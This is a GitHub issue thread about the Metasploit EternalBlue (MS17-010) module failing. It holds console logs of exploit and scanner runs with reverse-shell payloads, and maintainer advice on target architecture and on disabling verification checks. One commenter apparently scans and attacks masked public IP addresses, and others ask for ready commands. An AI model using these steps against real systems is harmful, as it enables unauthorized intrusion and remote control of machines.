search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.73k stars 13.89k forks source link

eternalblue exploit issue #8477

Closed italy2010 closed 7 years ago

italy2010 commented 7 years ago 
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.226.128:4444 
[*] 10.10.10.1:445 - Connecting to target for exploitation.
[+] 10.10.10.1:445 - Connection established for exploitation.
[*] 10.10.10.1:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.1:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.1:445 - Starting non-paged pool grooming
[+] 10.10.10.1:445 - Sending SMBv2 buffers
[+] 10.10.10.1:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.1:445 - Sending final SMBv2 buffers.
[*] 10.10.10.1:445 - Sending last fragment of exploit packet!
[*] 10.10.10.1:445 - Receiving response from exploit packet
[-] 10.10.10.1:445 - NoMethodError
[-] 10.10.10.1:445 - undefined method `[]' for nil:NilClass
[-] 10.10.10.1:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:293:in `smb1_get_response'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:188:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:99:in `block in exploit'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:95:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exit

OS

What OS are you running Metasploit on?

kali 2017

cbrnrd commented 7 years ago

Do you have any additional info on the target machine? (arch, windows version, etc.)

mlshore commented 7 years ago

Same issue, on both Windows 7 enterprise build 7601 SP1 and Windows 8.1 enterprise build 9600 no SP. On launching the exploit Windows 7 throws a blue screen immediately and Windows 8 does nothing.

ghost commented 7 years ago

This should have been fixed in #8399

We can tell this example doesn't have #8399 because there is no "CORE buffer dump" for the banner string.

@mlshore we should expect opposite behavior, i.e. 8 crashes as we haven't put those offsets in the module yet

drimaed commented 7 years ago 
msf exploit(ms17_010_eternalblue) > use  auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 196.***.***.***
rhosts => 196.***.***.***
msf auxiliary(smb_ms17_010) > run

[-] 196.***.***.***:445      - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > set rhosts 82.***.***.***
rhosts => 82.***.***.***
msf auxiliary(smb_ms17_010) > run

[+] 82.***.***.***:445    - Host is likely VULNERABLE to MS17-010!  (Windows Server (R) 2008 Standard 6002 Service Pack 2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 82.***.***.***
rhost => 82.***.***.***
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               82.***.***.***   yes       The target address
   RPORT               445              yes       The target port (TCP)
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.***.***.***    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) >

I hope this could help (metasploit v4.14.22-dev)

void-in commented 7 years ago

@drimaed The target OS might be 32 bit. The module in MSF tree right now only target x64 as you can see from the show targets option.

ghost commented 7 years ago

@drimaed The target could possibly be 64-bit. The problem here is the kernel version is 6002, meaning it is not Server 2008 R2.

Server 2008 is based on Vista. Server 2008 R2 is Windows 7.

Vista is not currently supported.

amster699 commented 7 years ago

hey bro how can i fix this ?? let me now if you can help thanks 

msf auxiliary(smb_ms17_010) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >
h00die commented 7 years ago

@amster699 I fixed it by wrapping your console output in ```.

amster699 commented 7 years ago

sorry brother did not understand very well wat you meaning.. can you explain bether? thanks

amster699 commented 7 years ago

should i have also port 4444 enabled right?

amster699 commented 7 years ago

if you can leave here the comands i should use for that i will stay very thankfull brother thanks

busterb commented 7 years ago

closing in favor of #8835

d1g1taltor commented 6 years ago

I know this is closed, but would like to add the architecture is wrong on the target system is 2008 standard, needs to be 2008 R2.

jordan12121 commented 6 years ago

I ask is it possible if exploit eternalblue outside our wifi?

Hugovn commented 6 years ago

The same issue. Pls check for me.

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 172.168.22.156 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.168.22.134 yes The listen address (an interface may be specified) LPORT 445 yes The listen port

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > run

[] Started reverse TCP handler on 172.168.22.134:445 [] 172.168.22.156:445 - Connecting to target for exploitation. [+] 172.168.22.156:445 - Connection established for exploitation. [+] 172.168.22.156:445 - Target OS selected valid for OS indicated by SMB reply [] 172.168.22.156:445 - CORE raw buffer dump (40 bytes) [] 172.168.22.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B [] 172.168.22.156:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic [] 172.168.22.156:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1 [!] 172.168.22.156:445 - Target arch is x64, but server returned "x86" [!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply [!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually... [-] 172.168.22.156:445 - Unable to continue with improper OS Arch. [*] Exploit completed, but no session was created. msf exploit(windows/smb/ms17_010_eternalblue) >

bcoles commented 6 years ago

@Hugovn this issue is closed please create a new issue.

That said, the output suggests that the target is x86 not x64. Have you tried set VerifyArch false ?

[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.
K4bl0-Skat3R commented 5 years ago

hi guys i have this problem after pos-explotation msf exploit(ms17_010_eternalblue) > run

[] Started reverse TCP handler on 10.10.14.247:4445 [] 127.0.0.1:445 - Connecting to target for exploitation. [-] 127.0.0.1:445 - Could not make SMBv1 connection [*] Exploit completed, but no session was created.

ykla commented 5 years ago

I met the same question. timeout

itzNikhilll commented 5 years ago

Hello guys Help! auxiliary scanner does not check if target is vulnerable or not :- see below

msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx rhosts => 192.168.xx.xxx msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 192.168.xx.xxx yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_ms17_010) >

jordan12121 commented 5 years ago

455 not open

Pada tanggal 6 Sep 2019 14:26, "Nikhil672" notifications@github.com menulis:

Hello guys Help! auxiliary scanner does not check if target is vulnerable or not :- see below

msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx rhosts => 192.168.xx.xxx msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 192.168.xx.xxx yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_ms17_010) >

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8477?email_source=notifications&email_token=AJMTK6IAP5BOPVTFZL6JLZTQIIAZLA5CNFSM4DNEU5BKYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOD6B7ZVQ#issuecomment-528743638, or mute the thread https://github.com/notifications/unsubscribe-auth/AJMTK6MWA2G3GSKANIKVPG3QIIAZLANCNFSM4DNEU5BA .